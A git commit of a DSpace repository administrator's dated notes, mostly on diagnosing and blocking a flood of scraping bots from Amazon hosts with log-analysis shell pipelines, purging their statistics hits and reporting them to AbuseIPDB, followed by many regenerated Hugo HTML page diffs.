Add notes for 2022-04-27

This commit is contained in:
Alan Orth 2022-04-27 09:58:45 +03:00
parent 4ddc675e55
commit 5cfe954a53
Signed by: alanorth
GPG Key ID: 0FB860CC9C45B1B9
123 changed files with 1461 additions and 655 deletions


@@ -228,4 +228,149 @@ $ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p 'fuu
- Then I started a new harvest on AReS
## 2022-04-27
- I woke up to many up/down notices for CGSpace from UptimeRobot
- The server has load 111.0... sigh.
- According to Grafana it seems to have started at 4:00 AM
![Grafana load](/cgspace-notes/2022/04/cgspace-load.png)
- There are a metric fuck ton of database locks from the XMLUI:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
128 dspaceApi
16890 dspaceWeb
```
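The `grep -o | sort | uniq -c` counting idiom above can be sanity-checked on canned input before pointing it at a live database; a minimal sketch (the three sample rows are fabricated, not real `pg_stat_activity` output):

```console
# Simulate pg_stat_activity rows mentioning the two DSpace pool names,
# then count occurrences the same way as against the live database
printf 'pl dspaceWeb idle\npl dspaceWeb active\npl dspaceApi idle\n' \
  | grep -o -E '(dspaceWeb|dspaceApi)' \
  | sort | uniq -c | sort -rn
```

This counts `dspaceWeb` twice and `dspaceApi` once, mirroring how the real query tallies locks per connection pool.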
- As for the server logs, I don't see many IPs connecting today:
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
2924
```
- But there appear to be some IPs making many requests:
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
...
345 207.46.13.53
646 66.249.66.222
678 54.90.79.112
1529 136.243.148.249
1797 54.175.8.110
2304 174.129.118.171
2523 66.249.66.221
2632 52.73.204.196
2667 54.174.240.122
5206 35.172.193.232
5646 35.153.131.101
6373 3.85.92.145
7383 34.227.10.4
8330 100.24.63.172
8342 34.236.36.176
8369 44.200.190.111
8371 3.238.116.153
8391 18.232.101.158
8631 3.239.81.247
8634 54.82.125.225
```
- 54.82.125.225, 3.239.81.247, 18.232.101.158, 3.238.116.153, 44.200.190.111, 34.236.36.176, 100.24.63.172, 3.85.92.145, 35.153.131.101, 35.172.193.232, 54.174.240.122, 52.73.204.196, 174.129.118.171, 54.175.8.110, and 54.90.79.112 are all on Amazon and using this normal-looking user agent:
```
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
```
- None of these hosts re-use their DSpace session IDs, so they are definitely not the normal browsers they claim to be:
```console
$ grep 54.82.125.225 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5760
$ grep 3.239.81.247 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
6053
$ grep 18.232.101.158 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5841
$ grep 3.238.116.153 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5887
$ grep 44.200.190.111 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5899
...
```
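Rather than repeating that grep for each address by hand, the same check can be looped over a list of IPs. A sketch against a fabricated log fragment (the session IDs and IPs below are made up, but follow the `session_id=...:ip_addr=` format from dspace.log):

```console
# Two fake sessions for 1.2.3.4 and one for 5.6.7.8
log='session_id=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:ip_addr=1.2.3.4
session_id=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB:ip_addr=1.2.3.4
session_id=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:ip_addr=5.6.7.8'

for ip in 1.2.3.4 5.6.7.8; do
  # Count distinct session IDs seen for this IP
  n=$(echo "$log" | grep "ip_addr=$ip" \
        | grep -oE 'session_id=[A-Z0-9]{32}' | sort -u | wc -l)
  echo "$ip: $n unique sessions"
done
```

A well-behaved browser would show one session per IP; the bots above show thousands.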
- And we can see a massive spike in sessions in Munin:
![Munin DSpace sessions](/cgspace-notes/2022/04/jmx_dspace_sessions-day2.png)
- I see the following IPs using that user agent today:
```console
# grep 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
678 54.90.79.112
1797 54.175.8.110
2697 174.129.118.171
2765 52.73.204.196
3072 54.174.240.122
5206 35.172.193.232
5646 35.153.131.101
6783 3.85.92.145
7763 34.227.10.4
8738 100.24.63.172
8748 34.236.36.176
8787 3.238.116.153
8794 18.232.101.158
8806 44.200.190.111
9021 54.82.125.225
9027 3.239.81.247
```
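Dropping the counts from that pipeline yields the plain IP list that the firewall and Solr purge steps consume. A sketch on fabricated access-log lines (the IPs, file names, and simplified log format are examples, not real log data):

```console
# Build a list of unique IPs that sent a given user agent
ua='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1)'
printf '1.1.1.1 - - "GET / HTTP/1.1" 200 "%s"\n2.2.2.2 - - "GET / HTTP/1.1" 200 "%s"\n1.1.1.1 - - "GET / HTTP/1.1" 200 "%s"\n' \
  "$ua" "$ua" "$ua" > /tmp/access-sample.log

# -F treats the user agent as a fixed string (it contains regex metacharacters)
grep -F "$ua" /tmp/access-sample.log | awk '{print $1}' | sort -u > /tmp/ips-sample.txt
cat /tmp/ips-sample.txt
```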
- I added those IPs to the firewall and then purged their hits from Solr:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 6024 hits from 100.24.63.172 in statistics
Purging 1719 hits from 174.129.118.171 in statistics
Purging 5972 hits from 18.232.101.158 in statistics
Purging 6053 hits from 3.238.116.153 in statistics
Purging 6228 hits from 3.239.81.247 in statistics
Purging 5305 hits from 34.227.10.4 in statistics
Purging 6002 hits from 34.236.36.176 in statistics
Purging 3908 hits from 35.153.131.101 in statistics
Purging 3692 hits from 35.172.193.232 in statistics
Purging 4525 hits from 3.85.92.145 in statistics
Purging 6048 hits from 44.200.190.111 in statistics
Purging 1942 hits from 52.73.204.196 in statistics
Purging 1944 hits from 54.174.240.122 in statistics
Purging 1264 hits from 54.175.8.110 in statistics
Purging 6117 hits from 54.82.125.225 in statistics
Purging 486 hits from 54.90.79.112 in statistics
Total number of bot hits purged: 67229
```
- Then I created a CSV with these IPs and reported them to AbuseIPDB.com:
```console
$ cat /tmp/ips.csv
IP,Categories,ReportDate,Comment
100.24.63.172,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
174.129.118.171,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
18.232.101.158,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.238.116.153,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.239.81.247,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
34.227.10.4,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
34.236.36.176,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
35.153.131.101,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
35.172.193.232,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.85.92.145,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
44.200.190.111,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
52.73.204.196,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.174.240.122,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.175.8.110,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.82.125.225,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.90.79.112,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
```
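Writing that CSV by hand for sixteen addresses is tedious; it can be generated from the IP list with a small loop. A sketch (the file names are examples; the category code and timestamp reuse the values from the report above):

```console
# Turn a plain list of IPs into an AbuseIPDB bulk-report CSV,
# reusing the category (4) and timestamp from the report above
ts='2022-04-27T04:00:37-10:00'
printf '100.24.63.172\n174.129.118.171\n' > /tmp/report-ips.txt

echo 'IP,Categories,ReportDate,Comment' > /tmp/ips-report.csv
while read -r ip; do
  echo "$ip,4,$ts,\"Excessive automated HTTP requests\"" >> /tmp/ips-report.csv
done < /tmp/report-ips.txt
cat /tmp/ips-report.csv
```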
<!-- vim: set sw=2 ts=2: -->

The remaining changed files in this commit are HTML pages regenerated by Hugo. Each carries the same two changes: the generator meta tag is bumped from Hugo 0.96.0 to 0.97.3, and the sidebar archive list is updated so that the April, 2022 entry links to /cgspace-notes/2022-04/ rather than /cgspace-notes/2022-03/.
Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nairobi right now
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -656,9 +656,9 @@ $ curl -X GET -H &#34;Content-Type: application/json&#34; -H &#34;Accept: applic
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ Send a note about my dspace-statistics-api to the dspace-tech mailing list
Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage
Today these are the top 10 IPs:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -553,9 +553,9 @@ $ dspace dsrun org.dspace.eperson.Groomer -a -b 11/27/2016 -d
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ Then I ran all system updates and restarted the server
I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another Ghostscript vulnerability last week
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -594,9 +594,9 @@ UPDATE 1
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -50,7 +50,7 @@ I don&rsquo;t see anything interesting in the web server logs around that time t
357 207.46.13.1
903 54.70.40.11
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1264,9 +1264,9 @@ identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInter
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -72,7 +72,7 @@ real 0m19.873s
user 0m22.203s
sys 0m1.979s
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1344,9 +1344,9 @@ Please see the DSpace documentation for assistance.
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -46,7 +46,7 @@ Most worryingly, there are encoding errors in the abstracts for eleven items, fo
I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1208,9 +1208,9 @@ sys 0m2.551s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -64,7 +64,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u ds
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1299,9 +1299,9 @@ UPDATE 14
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -48,7 +48,7 @@ DELETE 1
But after this I tried to delete the item from the XMLUI and it is still present&hellip;
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -631,9 +631,9 @@ COPY 64871
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -34,7 +34,7 @@ Run system updates on CGSpace (linode18) and reboot it
Skype with Marie-Angélique and Abenet about CG Core v2
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -317,9 +317,9 @@ UPDATE 2
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -38,7 +38,7 @@ CGSpace
Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -554,9 +554,9 @@ issn.validate(&#39;1020-3362&#39;)
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -46,7 +46,7 @@ After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s luck
Run system updates on DSpace Test (linode19) and reboot it
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -573,9 +573,9 @@ sys 2m27.496s
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -72,7 +72,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
7249 2a01:7e00::f03c:91ff:fe18:7396
9124 45.5.186.2
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -581,9 +581,9 @@ $ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institut
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="October, 2019"/>
<meta name="twitter:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unnecessary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -385,9 +385,9 @@ $ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -58,7 +58,7 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -692,9 +692,9 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -46,7 +46,7 @@ Make sure all packages are up to date and the package manager is up to date, the
# dpkg -C
# reboot
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -404,9 +404,9 @@ UPDATE 1
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -56,7 +56,7 @@ I tweeted the CGSpace repository link
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -604,9 +604,9 @@ COPY 2900
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -38,7 +38,7 @@ The code finally builds and runs with a fresh install
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1275,9 +1275,9 @@ Moving: 21993 into core statistics-2019
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -42,7 +42,7 @@ You need to download this into the DSpace 6.x source and compile it
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -484,9 +484,9 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -48,7 +48,7 @@ The third item now has a donut with score 1 since I tweeted it last week
On the same note, the one item Abenet pointed out last week now has a donut with score of 104 after I tweeted it last week
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -658,9 +658,9 @@ $ psql -c &#39;select * from pg_stat_activity&#39; | wc -l
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -34,7 +34,7 @@ I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -477,9 +477,9 @@ Caused by: java.lang.NullPointerException
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ I sent Atmire the dspace.log from today and told them to log into the server to
In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working
I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -811,9 +811,9 @@ $ csvcut -c &#39;id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]&#
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -38,7 +38,7 @@ I restarted Tomcat and PostgreSQL and the issue was gone
Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1142,9 +1142,9 @@ Fixed 4 occurences of: Muloi, D.M.
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ It is class based so I can easily add support for other vocabularies, and the te
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -798,9 +798,9 @@ $ grep -c added /tmp/2020-08-27-countrycodetagger.log
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -48,7 +48,7 @@ I filed a bug on OpenRXV: https://github.com/ilri/OpenRXV/issues/39
I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -717,9 +717,9 @@ solr_query_params = {
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -44,7 +44,7 @@ During the FlywayDB migration I got an error:
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -1241,9 +1241,9 @@ $ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -32,7 +32,7 @@ So far we&rsquo;ve spent at least fifty hours to process the statistics and stat
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -731,9 +731,9 @@ $ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspa
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -36,7 +36,7 @@ I started processing those (about 411,000 records):
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -869,9 +869,9 @@ $ query-json &#39;.items | length&#39; /tmp/policy2.json
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -50,7 +50,7 @@ For example, this item has 51 views on CGSpace, but 0 on AReS
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -688,9 +688,9 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -60,7 +60,7 @@ $ curl -s &#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#3
}
}
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -898,9 +898,9 @@ dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -34,7 +34,7 @@ Also, we found some issues building and running OpenRXV currently due to ecosyst
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -875,9 +875,9 @@ Also, we found some issues building and running OpenRXV currently due to ecosyst
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

View File

@ -44,7 +44,7 @@ Perhaps one of the containers crashed, I should have looked closer but I was in
"/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
